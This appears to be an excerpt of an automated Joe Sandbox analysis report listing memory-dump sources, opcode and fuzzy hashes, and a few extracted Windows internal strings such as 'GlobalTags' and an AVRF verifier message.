                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalTags
                                                                              • API String ID: 0-1106856819
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .mui
                                                                              • API String ID: 0-1199573805
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #
                                                                              • API String ID: 0-1885708031
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              Strings
                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                              • API String ID: 0-702105204
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                                              • Instruction ID: bfdae8a0097f9861468c04aec80cdeab4291f5f3482a71af1dbae588dd05ac52
                                                                              • Opcode Fuzzy Hash: 526def8403ab6b7ac16b08de256ed700655625ac5156d1e5e3cad61efd2d2818
                                                                              • Instruction Fuzzy Hash: E171DF75D00629DBCB268F59C9907FEFBB1FF59710F14815AE942AB390E3709940CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 09c69beae6d93c72f86271a5709d96935027c6b2996ac97910e2abcc132ac709
                                                                              • Instruction ID: 8d2e4e4e7824de0506e026cde8b28b5c9a41a6da97b09829c2ebedd44db4c3c5
                                                                              • Opcode Fuzzy Hash: 09c69beae6d93c72f86271a5709d96935027c6b2996ac97910e2abcc132ac709
                                                                              • Instruction Fuzzy Hash: 5871A270901205EFDBA1CF69D944A9ABBF9FF84301F28415AEA14E7259F7368B80CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                                              • Instruction ID: b3d9a60e0b40aefba73f1820b0edefba13bd74f35cc3071e497d5433c0b58167
                                                                              • Opcode Fuzzy Hash: 78e046400c392b588ed5d6831326344485066e989f3038173dfa93c04763a8ee
                                                                              • Instruction Fuzzy Hash: F371F1316052428FD312DF2CC484BAAF7E5FF84314F0485AAE898CB756EB34E946CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                              • Instruction ID: dd0c7f760964975dec0fce6b4bd7cba7810a90c28419d1cb07b91227af8ffef9
                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                              • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                                              • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                                              • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                                              • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                                              • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                                              • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                                              • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                                              • Instruction ID: 4f16ea754ab112880a6252b4fd1f3957aabe4082dbad0cc9c0fd0de2bf310e7d
                                                                              • Opcode Fuzzy Hash: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                                              • Instruction Fuzzy Hash: 4151B172504612AFD755DEA8C8C8E5BBBE8EFC8754F010A29BE40DB150D770EE05C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf5f1f5081844516ee152842fa1f81b122d8dafed407fa6c794e9f13133bcdbd
                                                                              • Instruction ID: a0cd586d57d513f93b213f220a25042d0d9c545fd395cfba2d5bde3d00aa6873
                                                                              • Opcode Fuzzy Hash: cf5f1f5081844516ee152842fa1f81b122d8dafed407fa6c794e9f13133bcdbd
                                                                              • Instruction Fuzzy Hash: EE51B0726043029FD711DF28C840BAABBE9FF95354F04492CFA89D7290D734EA48CB96
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                                              • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                                              • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                                              • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                                              • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                                              • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                                              • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                                              • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                                              • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                                              • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                              • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                              • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                              • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                              • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                                              • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                                              • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                                              • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                                              • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                                              • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                                              • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                                              • Instruction ID: 519b3bc8ef7cb41f8522ee9945da4167bba61f5ea48491570d4b714792967c60
                                                                              • Opcode Fuzzy Hash: 0a6e1bb6a101e43c3120f177c1065fe99694f3e5c0751fea3124902f102aadae
                                                                              • Instruction Fuzzy Hash: 28412B72B002069BCB25EFA898C5F7AB774FB58718F5504ACED16DB249E7B1DA00CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                              • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                              • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                                              • Instruction ID: 3d913a2a7b2eb1399d72481caedbb91731d86efdc2b804843a16ac212867df9d
                                                                              • Opcode Fuzzy Hash: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                                              • Instruction Fuzzy Hash: 25419B76D012199BDB14DF98C440AEEFBB4BF48710F14926EF915E7240DB35AD41CBA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                                              • Instruction ID: 50bc324ccacbb44569295e87da78ba602d169cadb4b8f689506b1e30240dca51
                                                                              • Opcode Fuzzy Hash: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                                              • Instruction Fuzzy Hash: 6141C0712003069FD721DF28C884A6BFBE9FF88324F14486DEA57C7656EB35E9448B50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                                              • Instruction ID: 74e592b2d449648153858fb5c0320a2f1e35eaba738c333d4f5eaa5410a710a3
                                                                              • Opcode Fuzzy Hash: 63ffb35998522aa1724b195a7fbe298b3422edd56f446e7e2eaa1b41c7d5d1d6
                                                                              • Instruction Fuzzy Hash: 1131A0727016869BF3235B5CCD88F65BBDCBB40B44F1D04A0AE46EB6D5DB28DA80C221
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                                              • Instruction ID: 6966f9c6a5252774bedace0b7ec0b833a1913b80049dfc7d8b38b92eb5d11e11
                                                                              • Opcode Fuzzy Hash: 3ae6a3f440c62ba3d1e1cfc51e481a5a4415540edd67eb668728c2dfe414a4d2
                                                                              • Instruction Fuzzy Hash: 8B31B275A0015AABDB15DF98C884FAEB7B9FB48B40F554168E901EB344E770AE40CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                                              • Instruction ID: 6eb000f220b5e12cf47be026d9754a8a0bf1143b12d664c268a8739bbcd010d7
                                                                              • Opcode Fuzzy Hash: da38070620965b46a0f82883bf6f15be31593af66ab84491bb7748671ced683f
                                                                              • Instruction Fuzzy Hash: CF313376A4012DABCF21DF54DC88BDEBBF5AB98350F1401A5A508E7260DA309F919F90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                                              • Instruction ID: 619f1656e0b54067e146f82db90366e07e772fbaf2c1ffffe2930eb65bbbab15
                                                                              • Opcode Fuzzy Hash: 9fdb0683f9ef4cc6d1429ff5ec618e94de8635aadc844e3e85ad7f3c7638d14f
                                                                              • Instruction Fuzzy Hash: 6131B272A01219AFDB32DEA9CC40EAEFBF8EF44750F018469E915D7250D6709E008BA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                                              • Instruction ID: 831edc2528853fb5296912b5a8dfe61ce2d0f859ad08a58e1df9e57169d22073
                                                                              • Opcode Fuzzy Hash: bd5da5f8eadab850b5e4be53cb22654cfd06f312f56bafcba632929006e4afdf
                                                                              • Instruction Fuzzy Hash: A231C871700A46EFDB129FA9C890B6ABBBDAF44754F25406DE505EB342EB30DE018B90
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                                              • Instruction ID: fc4f3ea409adaf23aedd1b0917fb6cbcd956f24a6514af34e1babe2fc0987255
                                                                              • Opcode Fuzzy Hash: 6895a34577b9927be8569be76bb3a245c5478c84f3ef0f08b1c77a9df61f019b
                                                                              • Instruction Fuzzy Hash: B331F172A44202DBCB12DE288884A6BFBA5AFD4650F414A2DFD5597314DA30DC01CBE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                                              • Instruction ID: a411992acea8388e380c3d1b6f72ffb01db86b61e84414c8dc64f8d4047c0500
                                                                              • Opcode Fuzzy Hash: b0714c8d897922f2a24b460f72448b343fed8ec2b2e09fa83627477dda75671a
                                                                              • Instruction Fuzzy Hash: 8C319E716053018FE761CF19C848B2AFBE6FB88700F544A6DE984DB391D7B0E944CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                              • Instruction ID: 55957e749cd97b6429a4102f4131732484dee991ea324a8b8c4fe1d06bb950ed
                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                              • Instruction Fuzzy Hash: 52312AB2B00B05AFD761CF69CD40B57BBF8BB08B60F15096DA59AC3651E670E9008B60
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                                              • Instruction ID: 23fa8c12a0bc8480d24053063301aa245b611a55ab81abdf8b62d726a921530e
                                                                              • Opcode Fuzzy Hash: c076737cada405ce2355904bfd1d1c5d756fd96c1044e299879216d18cbe60c4
                                                                              • Instruction Fuzzy Hash: D931C9B15053068FCB10DF19C48095ABBF1FF89314F0849AEE488DB312E735EA44CB96
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                                              • Instruction ID: 6357d6eb270f2a91d83a620e2d4f250b65cb0b07a9378d98597da3db8004e080
                                                                              • Opcode Fuzzy Hash: 0ff1679991c7d656425ae287e806c74da59451a743c947ee46a7ab03e06b9052
                                                                              • Instruction Fuzzy Hash: F731E471B002059FD720DFA8CC94A6EFBF9AB94B04F20842DD516D7294D730DA41CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                              • Instruction ID: f840d41fb95fe3930e2e805c67dc9b334f9344d8f0241842edf8ec8306402caa
                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                              • Instruction Fuzzy Hash: 7B210636E4025AAADF11DBB98841BAFFBB5EF15740F0580799F19EB340E270D90487A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                                              • Instruction ID: 47859b19e0f3e1ec4b8b0c28d2d407d4f926fa510156c0b31fac4d625d755b1d
                                                                              • Opcode Fuzzy Hash: 13454f8a376007b4d28473045bf5c91735927f303ef67aa2edc00f0e4d43d921
                                                                              • Instruction Fuzzy Hash: D3313BB25002018BDB31AF5CCC85BAAFBB4EF51314F5481ADEA459F346EB34D985CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                              • Instruction ID: f17dc9f30ac5f6195093cd64b1693ff7227445f12aacc4205c180b4fd469862b
                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                              • Instruction Fuzzy Hash: F1212D3660075666CF15AB99C844EBAFFB8EF40714F40841AFE95CB591E734DA40C761
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1501644059.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_1770000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                                              • Instruction ID: 1a9a50f867323c214781afc0847934e7ef8d36f76404b36a961eb5da3c98240f
                                                                              • Opcode Fuzzy Hash: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
